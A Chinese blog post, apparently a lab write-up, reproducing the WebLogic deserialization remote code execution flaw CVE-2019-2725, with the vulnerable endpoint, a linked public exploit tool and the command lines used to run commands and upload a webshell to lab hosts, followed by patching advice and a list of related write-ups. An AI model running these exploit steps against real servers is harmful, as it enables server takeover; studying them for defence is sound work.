weblogic 远程代码执行 (CVE-2019-2725)

最新推荐文章于 2024-05-13 00:26:38 发布
最新推荐文章于 2024-05-13 00:26:38 发布
阅读量2.1k 收藏 2
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouthBelief/article/details/121119954
版权

@[TOC](weblogic 远程代码执行 (CVE-2019-2725))
所有文章,仅供安全研究与学习之用,后果自负!

weblogic 远程代码执行 (CVE-2019-2725)

这个漏洞依旧是根据weblogic的xmldecoder反序列化漏洞,通过针对Oracle官网历年来的补丁构造payload来绕过。

0x01 漏洞描述

Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。 由于在反序列化处理输入信息的过程中存在缺陷,未经授权的攻击者可以发送精心构造的恶意 HTTP 请求,利用该漏洞获取服务器权限,实现远程代码执行。

7001端口
漏洞存在于

/_async/AsyncResponseService

0x02 影响范围

weblogic 10.x
  weblogic 12.1.3

0x03 漏洞复现

版本为10.4.5
在这里插入图片描述

(1)访问 下方url 看是否存在漏洞
ip:7001/_async/AsyncResponseService

http://118.193.36.37:34266/_async/AsyncResponseService
在这里插入图片描述

工具利用

https://github.com/TopScrew/CVE-2019-2725

查看使用方法

python weblogic-2019-2725.py

在这里插入图片描述

执行命令
用 12.1.3 版本

python weblogic-2019-2725.py 12.1.3  http://118.193.36.37:30735 id

在这里插入图片描述

python weblogic-2019-2725.py 12.1.3  http://118.193.36.37:30735 whoami

在这里插入图片描述
上传webshll

python weblogic-2019-2725.py 12.1.3  http://118.193.36.37:30735

在这里插入图片描述

在这里插入图片描述

脚本中的webshlel 可以通过html编码解码 + hackbar修改
在这里插入图片描述

在这里插入图片描述
vulfocus/weblogic-CVE-2020-14750 10.4.5版本 也用该漏洞通过

0x04 漏洞修复

1、升级本地JDK环境

2、及时安装官方补丁

LuckyCharm~
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Weblogic】反序列化远程代码执行漏洞(CVE-2019-2725)
时乙的博客
12-08 371
CVE-2019-2725是一个Oracle weblogic反序列化远程命令执行漏洞,这个漏洞依旧是根据weblogic的xmldecoder反序列化漏洞,通过针对Oracle官网历年来的补丁构造payload来绕过。可以看做是CVE-2017-10271的又一入口。
Weblogic反序列化远程代码执行漏洞CVE-2019-2725)复现
hackzkaq的博客
03-10 4110
更多黑客技能 公众号:小道黑客 0x01 漏洞描述: wls9-async等组件为WebLogic Server提供异步通讯服务,默认应用于WebLogic部分版本。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者通过发送精心构造的恶意 HTTP 请求,即可获得目标服务器的权限,在未授权的情况下远程执行命令。 0x02 影响版本: Oracle WebLogic Server10.x Oracle WebLogic Server12.1.3.0.0 0x03 影响组件: wls9_async_res
[Vulfocus解题系列] weblogic 远程代码执行 (CVE-2019-2725)
00勇士王子的博客
07-15 811
漏洞介绍 名称: weblogic 远程代码执行 (CVE-2019-2725) 描述: Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。 由于在反序列化处理输入信息的过程中存在缺陷,未经授权的攻击者可以发送精心构造的恶意 HTTP 请求,利用该漏洞获取服务器权限,实现远程代码执行。 解题过程 1.访问靶场 2.漏洞存在于:_async/
2024年前端最全复现CVE-2024-2109 (Weblogic Server远程代码执行漏洞),2024年最新一次违反常规的前端大厂面试经历
最新发布
2401_84616533的博客
05-13 832
前端CSS面试题文档,JavaScript面试题文档,Vue面试题文档,大厂面试题文档开源分享:【大厂前端面试题解析+核心总结学习笔记+真实项目实战+最新讲解视频】2. 抓包,payload后面加入poc,然后再在请求包头部里面加入cmd:id(命令),如下图所示:poc如下:复现成功!复现方式二——反弹shell值。
Weblogic远程代码执行CVE-2023-21839复现及修复
szgyunyun的博客
03-16 628
WebLogic 存在远程代码执行漏洞CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。jdk1.8打包好的jar公众号回复"CVE-2023-21839"vps启用监听反弹端口。
Weblogic反序列化远程命令执行(CVE-2019-2725)
m0_65150886的博客
12-27 1077
CVE-2019-2725是一个Oracle weblogic反序列化远程命令执行漏洞,这个漏洞依旧是根据weblogic的xmldecoder反序列化漏洞,通过针对Oracle官网历年来的补丁构造payload来绕过。5.将GET改为POST,随后请求包部分除了第一行第二行保留,其他全部替换如下payload。2.可以访问/_async/AsyncResponseService,则存在漏洞。6.使用payload上传jsp木马。1.访问ip:port。1.升级本地JDK环境。4.开启http服务。
[Vulfocus解题系列] weblogic 远程代码执行 (CVE-2019-2729)
00勇士王子的博客
07-15 1854
漏洞介绍 解题过程 1.访问靶场 2.漏洞存在于:_async/AsyncResponseService,访问地址可以访问则存在漏洞 3.使用burp抓包然后构造payload发送到服务器,使服务器执行命令 执行id命令 执行whoami 命令 执行ls /tmp 命令,没有返回结果 POC ...
Weblogic反序列化远程代码执行漏洞CVE-2019-2725
weixin_41182861的博客
09-25 2225
漏洞简述 2019年4月17日,CNVD 发布《关于Oracle WebLogic wls9-async组件存在反序列化远程命令执行漏洞安全公告》,公告指出部分版本WebLogic中默认包含的wls9_async_response包,为WebLogic Server提供异步通讯服务。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者可以发送精心构造的恶意 HTTP 请求,获得目标服务器的权限,在未授权的情况下远程执行命令。 漏洞编号:CVE-2019-2725 影响版本:10.3.6.0、
CVE-2019-2725复现(从环境搭建到getshell)
1stPeak's Blog
07-16 6363
前言 今天复现CVE-2019-2725时从环境搭建到getshell,这一篇文章是我测试之后总结的一次完整的复现测试流程,供大家参考,如有不足,欢迎指正。 漏洞描述 Oracle WebLogic Server反序列化漏洞 ,该远程代码执行漏洞无需身份验证即可远程利用,即无需用户名和密码即可通过网络利用。 影响版本 Oracle WebLogic Server,版本 10.3.6.0、12.1.3.0 测试环境准备 注:我这里主要介绍linux下weblogic的搭建 1、Ubuntu 我用的ubuntu
Weblogic反序列化远程代码执行漏洞CVE-2019-2725)复现
锋刃科技的博客
03-06 1477
简介 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 影响版本 Oracle WebLogic Server 10.* Oracle WebLogic Server 12.1.3 环境搭建 这里使用docker来搭建 拉取镜像并运行 docker pu...
Weblogic-CVE-2019-2725补丁升级方法.docx
11-08
CVE-2019-2725是一个高危的代码执行漏洞,影响WebLogic Server的多个版本。由于其潜在的危害性,用户应及时采取措施修复。以下是修复该漏洞的详细步骤: 首先,确保在开始升级之前备份整个Oracle目录,以防万一出现...
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
11-23
Weblogic反序列化远程代码执行漏洞CVE-2018-2893)是Oracle WebLogic Server中一个严重安全问题,它允许攻击者通过发送恶意构造的序列化对象来执行任意代码,从而获得对服务器的完全控制。这个漏洞存在于WebLogic ...
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
weblogic cve_2019_2729.rar
10-10
Oracle WebLogic Server Patch Set Update 10.3.6.0.190716 README ============================================================== This README provides information about how to apply Oracle WebLogic ...
weblogic10.36 CVE-2018-2893补丁文件
08-02
weblogic10.36 CVE-2018-2893补丁文件 最新补丁文件,修复 WebLogicCVE-2018-2893)安全漏洞预警,oracle官方发布了2018年4...攻击者只需要发送精心构造的T3协议数据,就可以实现远程代码执行获取目标服务器的权限。
weblogic_rce:cve2019_2725,CNVD-C-2019-48814 Weblogic _async远程命令执行exp
03-15
CNVD-C-2019-48814,CVE-2019-2725 Weblogic _async远程命令执行exp 主要代码基于js实现。 Linux Payload使用Jason,Windows Payload修改为10271,执行java.lang.Runtime。 环境需求 Windows的所有版本。 用法 cve...
CVE-2019-2725
05-07
CVE-2019-2725是一项影响Oracle WebLogic Server的严重漏洞,它被评为10级危险等级。该漏洞允许攻击者通过发送精心构造的HTTP请求,远程执行任意代码。此漏洞的根本原因是WebLogic Server中的一个组件未正确处理XML输入,从而导致远程攻击者可以通过发送特定的HTTP请求,利用该漏洞进行远程代码执行。 为了解决这个漏洞,Oracle已经发布了紧急补丁,建议WebLogic Server用户尽快安装该补丁,以免遭受攻击。此外,还需要通过安全配置和合理的安全措施来保护WebLogic Server。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值